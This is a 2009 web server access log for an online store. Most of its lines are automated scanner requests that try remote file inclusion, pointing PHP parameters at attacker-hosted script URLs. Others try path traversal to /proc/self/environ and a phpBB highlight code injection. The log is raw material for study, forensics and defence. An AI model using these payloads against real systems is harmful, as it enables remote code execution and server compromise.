66.185.108.178 - - [12/Sep/2009:03:28:26 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:27 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
66.185.108.178 - - [12/Sep/2009:03:28:30 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 (.NET CLR 3.5.30729)"
209.59.12.99 - - [12/Sep/2009:03:29:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [12/Sep/2009:03:29:49 -0400] "GET /images/store_blades_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
61.100.186.87 - - [12/Sep/2009:03:30:45 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:03:30:45 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:03:30:45 -0400] "GET /logs/access_log.Q109081000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:03:30:45 -0400] "GET /logs/error_log.Q109081000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:03:31:50 -0400] "GET /logs/access_log.Q109081000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
213.189.2.39 - - [12/Sep/2009:03:31:56 -0400] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://yestour.net/bbs/ps/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.189.2.39 - - [12/Sep/2009:03:31:56 -0400] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://yestour.net/bbs/ps/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.189.2.39 - - [12/Sep/2009:03:32:04 -0400] "GET /logs/access_log.Q109090700%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://yestour.net/bbs/ps/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:03:32:13 -0400] "GET /logs/error_log.Q109081600%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:33:24 -0400] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:33:24 -0400] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:33:24 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
213.189.2.39 - - [12/Sep/2009:03:33:26 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://yestour.net/bbs/ps/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
213.189.2.39 - - [12/Sep/2009:03:33:30 -0400] "GET /logs/access_log.Q109090700//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://yestour.net/bbs/ps/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:33:31 -0400] "GET /logs/access_log.Q109090700//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:03:33:32 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:03:33:32 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:03:33:32 -0400] "GET /logs/access_log.Q109051000%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:03:34:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [12/Sep/2009:03:34:49 -0400] "GET /logs/access_log.Q109072200/setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Sep/2009:03:34:49 -0400] "GET /logs/access_log.Q109080800/setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Sep/2009:03:34:49 -0400] "GET /logs/setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Sep/2009:03:34:49 -0400] "GET /setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
67.71.48.169 - - [12/Sep/2009:03:35:18 -0400] "GET /logs/access_log.Q109052800/include/bbs.lib.inc.php?site_path=http://www.heartlandfencing.com/fence/templates/akoblueportal/css/echo? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
67.71.48.169 - - [12/Sep/2009:03:35:18 -0400] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.heartlandfencing.com/fence/templates/akoblueportal/css/echo? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
70.90.108.169 - - [12/Sep/2009:03:36:10 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:10 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:10 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:18 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:18 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:18 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:21 -0400] "GET /logs/access_log.Q109080500/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:36:28 -0400] "GET /logs/access_log.Q109080500%20%20/components/com_forum/download.php?phpbb_root_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:37:33 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.27.95.144 - - [12/Sep/2009:03:37:46 -0400] "GET /logs/access_log.Q109090700%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:03:39:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.71.48.169 - - [12/Sep/2009:03:40:09 -0400] "GET /logs/error_log.Q109052800/include/bbs.lib.inc.php?site_path=http://www.heartlandfencing.com/fence/templates/akoblueportal/css/echo? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Sep/2009:03:41:58 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:41:58 -0400] "GET /logs/access_log.Q109062800%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:41:58 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:03 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:03 -0400] "GET /logs/access_log.Q109062800//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:03 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:10 -0400] "GET /logs/access_log.Q109060300%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:14 -0400] "GET /logs/access_log.Q109060300//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:15 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:15 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:20 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:20 -0400] "GET /logs/access_log.Q109062800%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:20 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:21 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:21 -0400] "GET /logs/access_log.Q109062800%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:21 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:24 -0400] "GET /logs/access_log.Q109060300//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:25 -0400] "GET //?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:25 -0400] "GET /logs/access_log.Q109062800//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:25 -0400] "GET /logs//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:32 -0400] "GET /logs/access_log.Q109060300%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:34 -0400] "GET /logs/access_log.Q109060300%20%20//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:03:42:43 -0400] "GET /logs/access_log.Q109060300//?custompluginfile[]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.17.80 - - [12/Sep/2009:03:43:02 -0400] "GET /logs/error_log.Q109081300/index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.121.17.80 - - [12/Sep/2009:03:43:02 -0400] "GET /index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
91.121.17.80 - - [12/Sep/2009:03:43:02 -0400] "GET /logs/index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
91.121.17.80 - - [12/Sep/2009:03:43:02 -0400] "GET /logs/access_log.Q109081300/index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Sep/2009:03:44:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.89.206.145 - - [12/Sep/2009:03:47:24 -0400] "GET /logs/index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
203.89.206.145 - - [12/Sep/2009:03:47:24 -0400] "GET /index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
203.89.206.145 - - [12/Sep/2009:03:47:24 -0400] "GET /logs/access_log.Q109081300/index.php?lg=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Sep/2009:03:49:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.236.8 - - [12/Sep/2009:03:51:26 -0400] "GET /logs/access_log.Q109051000//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:03:54:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.75.202.55 - - [12/Sep/2009:03:56:17 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:17 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:17 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:18 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:18 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:18 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:03:56:22 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:03:56:22 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:03:56:22 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 200 17505 "-" "Mozilla/5.0"
64.92.112.118 - - [12/Sep/2009:03:56:28 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:30 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:03:56:30 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:03:56:30 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:03:56:30 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.75.202.55 - - [12/Sep/2009:03:56:32 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:34 -0400] "GET //galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:34 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:34 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.36.2.15 - - [12/Sep/2009:03:56:41 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lumosalliance.com//forums/rindu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:42 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:42 -0400] "GET //galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:03:56:43 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
